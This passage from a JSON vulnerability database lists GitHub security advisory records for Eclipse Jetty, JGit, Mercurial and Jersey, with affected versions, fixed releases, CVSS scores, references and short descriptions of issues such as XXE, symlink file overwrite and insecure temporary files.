"9.0.6.v20130930", "9.0.7.v20131107", "9.1.0.M0", "9.1.0.RC0", "9.1.0.RC1", "9.1.0.RC2", "9.1.0.v20131115", "9.1.1.v20140108", "9.1.2.v20140210", "9.1.3.v20140225", "9.1.4.v20140401", "9.1.5.v20140505", "9.1.6.v20160112", "9.2.0.M0", "9.2.0.M1", "9.2.0.RC0", "9.2.0.v20140526", "9.2.1.v20140609", "9.2.10.v20150310", "9.2.11.M0", "9.2.11.v20150529", "9.2.12.M0", "9.2.12.v20150709", "9.2.13.v20150730", "9.2.14.v20151106", "9.2.15.v20160210", "9.2.16.v20160414", "9.2.17.v20160517", "9.2.18.v20160721", "9.2.19.v20160908", "9.2.2.v20140723", "9.2.20.v20161216", "9.2.21.v20170120", "9.2.22.v20170606", "9.2.23.v20171218", "9.2.24.v20180105", "9.2.25.v20180606", "9.2.26.v20180806", "9.2.27.v20190403", "9.2.28.v20190418", "9.2.29.v20191105", "9.2.3.v20140905", "9.2.30.v20200428", "9.2.4.v20141103", "9.2.5.v20141112", "9.2.6.v20141205", "9.2.7.v20150116", "9.2.8.v20150217", "9.2.9.v20150224", "9.3.0.M0", "9.3.0.M1", "9.3.0.M2", "9.3.0.RC0", "9.3.0.RC1", "9.3.0.v20150612", "9.3.1.v20150714", "9.3.10.M0", "9.3.10.v20160621", "9.3.11.M0", "9.3.11.v20160721", "9.3.12.v20160915", "9.3.13.M0", "9.3.13.v20161014", "9.3.14.v20161028", "9.3.15.v20161220", "9.3.16.v20170120", "9.3.17.RC0", "9.3.17.v20170317", "9.3.18.v20170406", "9.3.19.v20170502", "9.3.2.v20150730", "9.3.20.v20170531", "9.3.21.M0", "9.3.21.RC0", "9.3.21.v20170918", "9.3.22.v20171030", "9.3.23.v20180228", "9.3.24.v20180605", "9.3.25.v20180904", "9.3.26.v20190403", "9.3.27.v20190418", "9.3.28.v20191105", "9.3.29.v20201019", "9.3.3.v20150827", "9.3.30.v20211001", "9.3.4.RC0", "9.3.4.RC1", "9.3.4.v20151007", "9.3.5.v20151012", "9.3.6.v20151106", "9.3.7.RC0", "9.3.7.RC1", "9.3.7.v20160115", "9.3.8.RC0", "9.3.8.v20160314", "9.3.9.M0", "9.3.9.M1", "9.3.9.v20160517", "9.4.0.M0", "9.4.0.M1", "9.4.0.RC0", "9.4.0.RC1", "9.4.0.RC2", "9.4.0.RC3", "9.4.0.v20161208", "9.4.0.v20180619", "9.4.1.v20170120", "9.4.1.v20180619", "9.4.10.RC0", "9.4.10.RC1", "9.4.10.v20180503", "9.4.11.v20180605", "9.4.12.RC0", "9.4.12.RC1", "9.4.12.RC2", "9.4.12.v20180830", "9.4.13.v20181111", "9.4.14.v20181114", "9.4.15.v20190215", "9.4.16.v20190411", "9.4.17.v20190418", "9.4.18.v20190429", "9.4.19.v20190610", "9.4.2.v20170220", "9.4.2.v20180619", "9.4.20.v20190813", "9.4.21.v20190926", "9.4.22.v20191022", "9.4.23.v20191118", "9.4.24.v20191120", "9.4.25.v20191220", "9.4.26.v20200117", "9.4.27.v20200227", "9.4.28.v20200408", "9.4.29.v20200521", "9.4.3.v20170317", "9.4.3.v20180619", "9.4.30.v20200611", "9.4.31.v20200723", "9.4.32.v20200930", "9.4.33.v20201020", "9.4.34.v20201102", "9.4.35.v20201120", "9.4.36.v20210114", "9.4.37.v20210219", "9.4.38.v20210224", "9.4.39.v20210325", "9.4.4.v20170414", "9.4.4.v20180619", "9.4.40.v20210413", "9.4.41.v20210516", "9.4.42.v20210604", "9.4.43.v20210629", "9.4.44.v20210927", "9.4.45.v20220203", "9.4.46.v20220331", "9.4.47.v20220610", "9.4.48.v20220622", "9.4.49.v20220914", "9.4.5.v20170502", "9.4.5.v20180619", "9.4.50.v20221201", "9.4.51.v20230217", "9.4.6.v20170531", "9.4.6.v20180619", "9.4.7.RC0", "9.4.7.v20170914", "9.4.7.v20180619", "9.4.8.v20171121", "9.4.8.v20180619", "9.4.9.v20180320" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.4.51", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/07/GHSA-58qw-p7qm-5rvh/GHSA-58qw-p7qm-5rvh.json" } } ], "references": [ { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/security/advisories/GHSA-58qw-p7qm-5rvh" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/pull/10067" }, { "type": "PACKAGE", "url": "https://github.com/eclipse/jetty.project" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-10.0.16" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-11.0.16" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-12.0.0" }, { "type": "WEB", "url": "https://github.com/eclipse/jetty.project/releases/tag/jetty-9.4.52.v20230823" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2023-07-10T21:52:39Z", "nvd_published_at": null, "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:L/A:L" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3p86-9955-h393", "published": "2023-09-18T15:30:18Z", "modified": "2024-04-11T19:46:07.697031Z", "aliases": [ "CVE-2023-4759" ], "related": [ "CGA-f3hc-jjwc-wwjp" ], "summary": "Arbitrary File Overwrite in Eclipse JGit ", "details": "Arbitrary File Overwrite in Eclipse JGit \u003c= 6.6.0\n\nIn Eclipse JGit, all versions \u003c= 6.6.0.202305301015-r, a symbolic link present in a specially crafted git repository can be used to write a file to locations outside the working tree when this repository is cloned with JGit to a case-insensitive filesystem, or when a checkout from a clone of such a repository is performed on a case-insensitive filesystem.\n\nThis can happen on checkout (DirCacheCheckout), merge (ResolveMerger via its WorkingTreeUpdater), pull (PullCommand using merge), and when applying a patch (PatchApplier). This can be exploited for remote code execution (RCE), for instance if the file written outside the working tree is a git filter that gets executed on a subsequent git command.\n\nThe issue occurs only on case-insensitive filesystems, like the default filesystems on Windows and macOS. The user performing the clone or checkout must have the rights to create symbolic links for the problem to occur, and symbolic links must be enabled in the git configuration.\n\nSetting git configuration option core.symlinks = false before checking out avoids the problem.\n\nThe issue was fixed in Eclipse JGit version 6.6.1.202309021850-r and 6.7.0.202309050840-r, available via Maven Central https://repo1.maven.org/maven2/org/eclipse/jgit/  and repo.eclipse.org https://repo.eclipse.org/content/repositories/jgit-releases/ . A backport is available in 5.13.3 starting from 5.13.3.202401111512-r.\n\nThe JGit maintainers would like to thank RyotaK for finding and reporting this issue.\n\n\n\n", "affected": [ { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "6.0.0.202111291000-r" }, { "fixed": "6.6.1.202309021850-r" } ] } ], "versions": [ "6.0.0.202111291000-r", "6.1.0.202203080745-r", "6.2.0.202206071550-r", "6.3.0.202209071007-r", "6.4.0.202211300538-r", "6.5.0.202303070854-r", "6.6.0.202305301015-r" ], "database_specific": { "last_known_affected_version_range": "\u003c= 6.6.0.202305301015-r", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-3p86-9955-h393/GHSA-3p86-9955-h393.json" } }, { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "5.13.3.202401111512-r" } ] } ], "versions": [ "1.2.0.201112221803-r", "1.3.0.201202151440-r", "2.0.0.201206130900-r", "2.1.0.201209190230-r", "2.2.0.201212191850-r", "2.3.1.201302201838-r", "3.0.0.201306101825-r", "3.1.0.201310021548-r", "3.2.0.201312181205-r", "3.3.0.201403021825-r", "3.3.1.201403241930-r", "3.3.2.201404171909-r", "3.4.0.201405051725-m7", "3.4.0.201405211411-rc1", "3.4.0.201405281120-rc2", "3.4.0.201406041058-rc3", "3.4.0.201406110918-r", "3.4.1.201406201815-r", "3.4.2.201412180340-r", "3.5.0.201409071800-rc1", "3.5.0.201409260305-r", "3.5.1.201410131835-r", "3.5.2.201411120430-r", "3.5.3.201412180710-r", "3.6.0.201411121045-m1", "3.6.0.201412230720-r", "3.6.1.201501031845-r", "3.6.2.201501210735-r", "3.7.0.201502260915-r", "3.7.1.201504261725-r", "4.0.0.201505050340-m2", "4.0.0.201505260635-rc2", "4.0.0.201506020755-rc3", "4.0.0.201506090130-r", "4.0.1.201506240215-r", "4.0.2.201509141540-r", "4.0.3.201509231615-r", "4.1.0.201509280440-r", "4.1.1.201511131810-r", "4.1.2.201602141800-r", "4.10.0.201712302008-r", "4.11.0.201803080745-r", "4.11.1.201807311124-r", "4.11.2.201809100523-r", "4.11.3.201809181037-r", "4.11.4.201810060650-r", "4.11.5.201810191925-r", "4.11.6.201812241910-r", "4.11.7.201903122105-r", "4.11.8.201904181247-r", "4.11.9.201909030838-r", "4.2.0.201601211800-r", "4.3.0.201604071810-r", "4.3.1.201605051710-r", "4.4.0.201605250940-rc1", "4.4.0.201606070830-r", "4.4.1.201607150455-r", "4.5.0.201609210915-r", "4.5.1.201703201650-r", "4.5.2.201704071617-r", "4.5.3.201708160445-r", "4.5.4.201711221230-r", "4.5.5.201812240535-r", "4.5.6.201903121547-r", "4.5.7.201904151645-r", "4.6.0.201612231935-r", "4.6.1.201703071140-r", "4.7.0.201704051617-r", "4.7.1.201706071930-r", "4.7.2.201807261330-r", "4.7.3.201809090215-r", "4.7.4.201809180905-r", "4.7.5.201810051826-r", "4.7.6.201810191618-r", "4.7.7.201812240805-r", "4.7.8.201903121755-r", "4.7.9.201904161809-r", "4.8.0.201705170830-rc1", "4.8.0.201706111038-r", "4.9.0.201710071750-r", "4.9.1.201712030800-r", "4.9.10.201904181027-r", "4.9.2.201712150930-r", "4.9.3.201807311005-r", "4.9.4.201809090327-r", "4.9.5.201809180939-r", "4.9.6.201810051924-r", "4.9.7.201810191756-r", "4.9.8.201812241815-r", "4.9.9.201903122025-r", "5.0.0.201805151920-m7", "5.0.0.201805221745-rc1", "5.0.0.201805301535-rc2", "5.0.0.201806131550-r", "5.0.1.201806211838-r", "5.0.2.201807311906-r", "5.0.3.201809091024-r", "5.1.0.201809111528-r", "5.1.1.201809181055-r", "5.1.10.201908230655-r", "5.1.11.201909031202-r", "5.1.12.201910011832-r", "5.1.13.202002110435-r", "5.1.14.202011251942-r", "5.1.15.202012011955-r", "5.1.16.202106041830-r", "5.1.2.201810061102-r", "5.1.3.201810200350-r", "5.1.5.201812261915-r", "5.1.6.201903130242-r", "5.1.7.201904200442-r", "5.1.8.201906050907-r", "5.1.9.201908210455-r", "5.10.0.202012080955-r", "5.11.0.202103091610-r", "5.11.1.202105131744-r", "5.12.0.202106070339-r", "5.13.0.202109080827-r", "5.13.1.202206130422-r", "5.13.2.202306221912-r", "5.2.0.201812061821-r", "5.2.1.201812262042-r", "5.2.2.201904231744-r", "5.3.0.201903130848-r", "5.3.1.201904271842-r", "5.3.2.201906051522-r", "5.3.4.201908231101-r", "5.3.5.201909031855-r", "5.3.6.201910020505-r", "5.3.7.202002110540-r", "5.3.8.202011260953-r", "5.3.9.202012012026-r", "5.4.0.201906121030-r", "5.4.2.201908231537-r", "5.4.3.201909031940-r", "5.5.0.201909110433-r", "5.5.1.201910021850-r", "5.6.0.201912101111-r", "5.6.1.202002131546-r", "5.7.0.202003090808-r", "5.7.0.202003110725-r", "5.8.0.202006091008-r", "5.8.1.202007141445-r", "5.9.0.202009080501-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/09/GHSA-3p86-9955-h393/GHSA-3p86-9955-h393.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-4759" }, { "type": "WEB", "url": "https://github.com/eclipse-jgit/jgit/issues/30" }, { "type": "PACKAGE", "url": "https://git.eclipse.org/c/jgit/jgit.git" }, { "type": "WEB", "url": "https://git.eclipse.org/c/jgit/jgit.git/commit/?id=9072103f3b3cf64dd12ad2949836ab98f62dabf1" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/11" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/5.13.3" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/6.6.1" } ], "database_specific": { "cwe_ids": [ "CWE-178" ], "github_reviewed": true, "github_reviewed_at": "2023-09-18T19:17:54Z", "nvd_published_at": "2023-09-12T10:15:29Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-6vvc-c2m3-cjf3", "published": "2022-05-17T19:57:29Z", "modified": "2024-09-25T20:01:24.028730Z", "aliases": [ "CVE-2014-9390", "PYSEC-2020-217" ], "summary": "JGit Improper Input Validation vulnerability", "details": "Git before 1.8.5.6, 1.9.x before 1.9.5, 2.0.x before 2.0.5, 2.1.x before 2.1.4, and 2.2.x before 2.2.1 on Windows and OS X; Mercurial before 3.2.3 on Windows and OS X; Apple Xcode before 6.2 beta 3; mine; libgit2; Egit; and JGit allow remote Git servers to execute arbitrary commands via a tree containing a crafted .git/config file with (1) an ignorable Unicode codepoint, (2) a git~1/config representation, or (3) mixed case that is improperly handled on a case-insensitive filesystem.", "affected": [ { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.5.3" } ] } ], "versions": [ "1.2.0.201112221803-r", "1.3.0.201202151440-r", "2.0.0.201206130900-r", "2.1.0.201209190230-r", "2.2.0.201212191850-r", "2.3.1.201302201838-r", "3.0.0.201306101825-r", "3.1.0.201310021548-r", "3.2.0.201312181205-r", "3.3.0.201403021825-r", "3.3.1.201403241930-r", "3.3.2.201404171909-r", "3.4.0.201405051725-m7", "3.4.0.201405211411-rc1", "3.4.0.201405281120-rc2", "3.4.0.201406041058-rc3", "3.4.0.201406110918-r", "3.4.1.201406201815-r", "3.4.2.201412180340-r", "3.5.0.201409071800-rc1", "3.5.0.201409260305-r", "3.5.1.201410131835-r", "3.5.2.201411120430-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6vvc-c2m3-cjf3/GHSA-6vvc-c2m3-cjf3.json" } }, { "package": { "name": "mercurial", "ecosystem": "PyPI", "purl": "pkg:pypi/mercurial" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.2.3" } ] } ], "versions": [ "0.8.1", "0.9", "0.9.1", "0.9.2", "0.9.3", "0.9.4", "0.9.5", "1.0", "1.0.1", "1.0.2", "1.1", "1.1.1", "1.1.2", "1.2", "1.2.1", "1.3", "1.3.1", "1.4", "1.4.1", "1.4.2", "1.4.3", "1.5", "1.5.1", "1.5.2", "1.5.3", "1.5.4", "1.6", "1.6.1", "1.6.2", "1.6.3", "1.6.4", "1.7", "1.7.1", "1.7.2", "1.7.3", "1.7.5", "1.8", "1.8.1", "1.8.2", "1.8.3", "1.8.4", "1.9", "1.9.1", "1.9.2", "1.9.3", "2.0", "2.0.1", "2.0.2", "2.1", "2.1.1", "2.1.2", "2.2", "2.2.2", "2.3", "2.4.1", "2.5", "2.5.1", "2.5.2", "2.6", "2.6.1", "2.6.2", "2.6.3", "2.7.0", "2.7.1", "2.7.2", "2.8", "2.8.1", "2.8.2", "2.9", "2.9.1", "3.0", "3.0.1", "3.1", "3.1.1", "3.1.2", "3.2", "3.2.1", "3.2.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-6vvc-c2m3-cjf3/GHSA-6vvc-c2m3-cjf3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9390" }, { "type": "WEB", "url": "https://github.com/libgit2/libgit2/commit/928429c5c96a701bcbcafacb2421a82602b36915" }, { "type": "WEB", "url": "https://github.com/blog/1938-git-client-vulnerability-announced" }, { "type": "WEB", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/mercurial/PYSEC-2020-217.yaml" }, { "type": "WEB", "url": "https://libgit2.org/security" }, { "type": "WEB", "url": "https://news.ycombinator.com/item?id=8769667" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/3.5.3" }, { "type": "WEB", "url": "https://web.archive.org/web/20211204220400/https://securitytracker.com/id?1031404" }, { "type": "WEB", "url": "http://article.gmane.org/gmane.linux.kernel/1853266" }, { "type": "WEB", "url": "http://git-blame.blogspot.com/2014/12/git-1856-195-205-214-and-221-and.html" }, { "type": "WEB", "url": "http://mercurial.selenic.com/wiki/WhatsNew" }, { "type": "WEB", "url": "http://securitytracker.com/id?1031404" }, { "type": "WEB", "url": "http://support.apple.com/kb/HT204147" } ], "database_specific": { "cwe_ids": [ "CWE-20" ], "github_reviewed": true, "github_reviewed_at": "2023-01-26T23:53:52Z", "nvd_published_at": "2020-02-12T02:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-vrpq-qp53-qv56", "published": "2025-05-21T21:31:37Z", "modified": "2025-10-14T14:04:29.533722Z", "aliases": [ "CVE-2025-4949" ], "related": [ "CGA-2h3q-7r7p-cmjc", "CGA-693f-m3w9-2fg3", "CGA-h9p7-2rvv-2cw5", "CGA-x238-2v8w-3j6m" ], "summary": "Eclipse JGit XML External Entity (XXE) Vulnerability", "details": "In Eclipse JGit versions 7.2.0.202503040940-r and older, the ManifestParser class used by the repo command and the AmazonS3 class used to implement the experimental amazons3 git transport protocol allowing to store git pack files in an Amazon S3 bucket, are vulnerable to XML External Entity (XXE) attacks when parsing XML files. This vulnerability can lead to information disclosure, denial of service, and other security issues.", "affected": [ { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.2.0.202503040940-r" }, { "fixed": "7.2.1.202505142326-r" } ] } ], "versions": [ "7.2.0.202503040940-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrpq-qp53-qv56/GHSA-vrpq-qp53-qv56.json" } }, { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.1.0.202411261347-r" }, { "fixed": "7.1.1.202505221757-r" } ] } ], "versions": [ "7.1.0.202411261347-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrpq-qp53-qv56/GHSA-vrpq-qp53-qv56.json" } }, { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "7.0.0.202409031743-r" }, { "fixed": "7.0.1.202505221510-r" } ] } ], "versions": [ "7.0.0.202409031743-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrpq-qp53-qv56/GHSA-vrpq-qp53-qv56.json" } }, { "package": { "name": "org.eclipse.jgit:org.eclipse.jgit", "ecosystem": "Maven", "purl": "pkg:maven/org.eclipse.jgit/org.eclipse.jgit" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "6.10.1.202505221210-r" } ] } ], "versions": [ "1.2.0.201112221803-r", "1.3.0.201202151440-r", "2.0.0.201206130900-r", "2.1.0.201209190230-r", "2.2.0.201212191850-r", "2.3.1.201302201838-r", "3.0.0.201306101825-r", "3.1.0.201310021548-r", "3.2.0.201312181205-r", "3.3.0.201403021825-r", "3.3.1.201403241930-r", "3.3.2.201404171909-r", "3.4.0.201405051725-m7", "3.4.0.201405211411-rc1", "3.4.0.201405281120-rc2", "3.4.0.201406041058-rc3", "3.4.0.201406110918-r", "3.4.1.201406201815-r", "3.4.2.201412180340-r", "3.5.0.201409071800-rc1", "3.5.0.201409260305-r", "3.5.1.201410131835-r", "3.5.2.201411120430-r", "3.5.3.201412180710-r", "3.6.0.201411121045-m1", "3.6.0.201412230720-r", "3.6.1.201501031845-r", "3.6.2.201501210735-r", "3.7.0.201502260915-r", "3.7.1.201504261725-r", "4.0.0.201505050340-m2", "4.0.0.201505260635-rc2", "4.0.0.201506020755-rc3", "4.0.0.201506090130-r", "4.0.1.201506240215-r", "4.0.2.201509141540-r", "4.0.3.201509231615-r", "4.1.0.201509280440-r", "4.1.1.201511131810-r", "4.1.2.201602141800-r", "4.10.0.201712302008-r", "4.11.0.201803080745-r", "4.11.1.201807311124-r", "4.11.2.201809100523-r", "4.11.3.201809181037-r", "4.11.4.201810060650-r", "4.11.5.201810191925-r", "4.11.6.201812241910-r", "4.11.7.201903122105-r", "4.11.8.201904181247-r", "4.11.9.201909030838-r", "4.2.0.201601211800-r", "4.3.0.201604071810-r", "4.3.1.201605051710-r", "4.4.0.201605250940-rc1", "4.4.0.201606070830-r", "4.4.1.201607150455-r", "4.5.0.201609210915-r", "4.5.1.201703201650-r", "4.5.2.201704071617-r", "4.5.3.201708160445-r", "4.5.4.201711221230-r", "4.5.5.201812240535-r", "4.5.6.201903121547-r", "4.5.7.201904151645-r", "4.6.0.201612231935-r", "4.6.1.201703071140-r", "4.7.0.201704051617-r", "4.7.1.201706071930-r", "4.7.2.201807261330-r", "4.7.3.201809090215-r", "4.7.4.201809180905-r", "4.7.5.201810051826-r", "4.7.6.201810191618-r", "4.7.7.201812240805-r", "4.7.8.201903121755-r", "4.7.9.201904161809-r", "4.8.0.201705170830-rc1", "4.8.0.201706111038-r", "4.9.0.201710071750-r", "4.9.1.201712030800-r", "4.9.10.201904181027-r", "4.9.2.201712150930-r", "4.9.3.201807311005-r", "4.9.4.201809090327-r", "4.9.5.201809180939-r", "4.9.6.201810051924-r", "4.9.7.201810191756-r", "4.9.8.201812241815-r", "4.9.9.201903122025-r", "5.0.0.201805151920-m7", "5.0.0.201805221745-rc1", "5.0.0.201805301535-rc2", "5.0.0.201806131550-r", "5.0.1.201806211838-r", "5.0.2.201807311906-r", "5.0.3.201809091024-r", "5.1.0.201809111528-r", "5.1.1.201809181055-r", "5.1.10.201908230655-r", "5.1.11.201909031202-r", "5.1.12.201910011832-r", "5.1.13.202002110435-r", "5.1.14.202011251942-r", "5.1.15.202012011955-r", "5.1.16.202106041830-r", "5.1.2.201810061102-r", "5.1.3.201810200350-r", "5.1.5.201812261915-r", "5.1.6.201903130242-r", "5.1.7.201904200442-r", "5.1.8.201906050907-r", "5.1.9.201908210455-r", "5.10.0.202012080955-r", "5.11.0.202103091610-r", "5.11.1.202105131744-r", "5.12.0.202106070339-r", "5.13.0.202109080827-r", "5.13.1.202206130422-r", "5.13.2.202306221912-r", "5.13.3.202401111512-r", "5.13.4.202507202350-r", "5.13.5.202508271544-r", "5.2.0.201812061821-r", "5.2.1.201812262042-r", "5.2.2.201904231744-r", "5.3.0.201903130848-r", "5.3.1.201904271842-r", "5.3.2.201906051522-r", "5.3.4.201908231101-r", "5.3.5.201909031855-r", "5.3.6.201910020505-r", "5.3.7.202002110540-r", "5.3.8.202011260953-r", "5.3.9.202012012026-r", "5.4.0.201906121030-r", "5.4.2.201908231537-r", "5.4.3.201909031940-r", "5.5.0.201909110433-r", "5.5.1.201910021850-r", "5.6.0.201912101111-r", "5.6.1.202002131546-r", "5.7.0.202003090808-r", "5.7.0.202003110725-r", "5.8.0.202006091008-r", "5.8.1.202007141445-r", "5.9.0.202009080501-r", "6.0.0.202111291000-r", "6.1.0.202203080745-r", "6.10.0.202406032230-r", "6.2.0.202206071550-r", "6.3.0.202209071007-r", "6.4.0.202211300538-r", "6.5.0.202303070854-r", "6.6.0.202305301015-r", "6.6.1.202309021850-r", "6.7.0.202309050840-r", "6.8.0.202311291450-r", "6.9.0.202403050737-r" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/05/GHSA-vrpq-qp53-qv56/GHSA-vrpq-qp53-qv56.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-4949" }, { "type": "PACKAGE", "url": "https://github.com/eclipse-jgit/jgit" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/64" }, { "type": "WEB", "url": "https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/281" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/5.13.4" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/6.10.1" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/7.0.1" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/7.1.1" }, { "type": "WEB", "url": "https://projects.eclipse.org/projects/technology.jgit/releases/7.2.1" } ], "database_specific": { "cwe_ids": [ "CWE-611" ], "github_reviewed": true, "github_reviewed_at": "2025-05-22T18:49:33Z", "nvd_published_at": "2025-05-21T07:16:01Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:A/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/S:N/AU:Y/R:U/V:D/RE:L/U:Green" } ] }, { "schema_version": "1.7.3", "id": "GHSA-c43q-5hpj-4crv", "published": "2021-04-23T16:55:01Z", "modified": "2024-03-08T05:18:14.836767Z", "aliases": [ "CVE-2021-28168" ], "related": [ "CVE-2021-28168" ], "summary": "Local information disclosure via system temporary directory", "details": "## Impact\nEclipse Jersey 2.28 - 2.33 and Eclipse Jersey 3.0.0 - 3.0.1 contains a local information disclosure vulnerability. This is due to the use of the `File.createTempFile` which creates a file inside of the system temporary directory with the permissions: `-rw-r--r--`. Thus the contents of this file are viewable by all other users locally on the system. As such, if the contents written is security sensitive, it can be disclosed to other local users.\n\n## Workaround\n\nThis issue can be mitigated by manually setting the `java.io.tmpdir` system property when launching the JVM.\n\n## Patches\n\nJersey 2.34 and 3.0.2 forward sets the correct permissions on the temporary file created by Jersey.\n\n### References\n \n - https://github.com/eclipse-ee4j/jersey/pull/4712\n - [CWE-378: Creation of Temporary File With Insecure Permissions](https://cwe.mitre.org/data/definitions/378.html)\n - [CWE-379: Creation of Temporary File in Directory with Insecure Permissions](https://cwe.mitre.org/data/definitions/379.html)\n\n## Similar Vulnerabilities\n\nSimilar, but not the same:\n\n - JUnit 4 - https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp\n - Google Guava - https://github.com/google/guava/issues/4011\n - Apache Ant - https://nvd.nist.gov/vuln/detail/CVE-2020-1945\n - JetBrains Kotlin Compiler - https://nvd.nist.gov/vuln/detail/CVE-2020-15824\n - Eclipse Jetty - https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6\n\n\n---\n\nOriginal Disclosure:\n\n\u003e Hello Jersey Security Team,\n\u003e \n\u003e Utilizing a custom CodeQL query written as a part of the [GitHub Security Lab](https://securitylab.github.com/) [Bug Bounty program](https://securitylab.github.com/bounties), I've unearthed a local temporary file information disclosure vulnerability.\n\u003e \n\u003e You can see the custom CodeQL query utilized here:\n\u003e https://lgtm.com/query/8831016213790320486/\n\u003e \n\u003e This particular vulnerability exists because on unix-like systems (not including modern versions of MacOS) the system temporary directory is shared between all users. As such, failure to correctly set file permissions and/or verify exclusive creation of directories can lead to either local information disclosure, or local file hijacking by another user.\n\u003e \n\u003e This vulnerability impacts the following locations in this project's source:\n\u003e \n\u003e - https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/core-common/src/main/java/org/glassfish/jersey/message/internal/FileProvider.java#L64-L73\n\u003e - https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/media/multipart/src/main/java/org/glassfish/jersey/media/multipart/internal/FormDataParamValueParamProvider.java#L202-L208\n\u003e \n\u003e This vulnerability exists because of the vulnerability in the `Utils.createTempFile`:\n\u003e \n\u003e https://github.com/eclipse-ee4j/jersey/blob/01c6a32a2064aeff2caa8133472e33affeb8a29a/core-common/src/main/java/org/glassfish/jersey/message/internal/Utils.java#L42-L53\n\u003e \n\u003e This is because `File.createTempFile` creates a file inside of the system temporary directory with the permissions: `-rw-r--r--`. Thus the contents of this file are viewable by all other users locally on the system.\n\u003e \n\u003e If there is sensitive information written to these files, it is disclosed to other local users on this system.\n\u003e \n\u003e The fix for this vulnerability is to use the `Files` API (instead of the `File` API) to create temporary files/directories as this new API correctly sets the posix file permissions.", "affected": [ { "package": { "name": "org.glassfish.jersey.core:jersey-common", "ecosystem": "Maven", "purl": 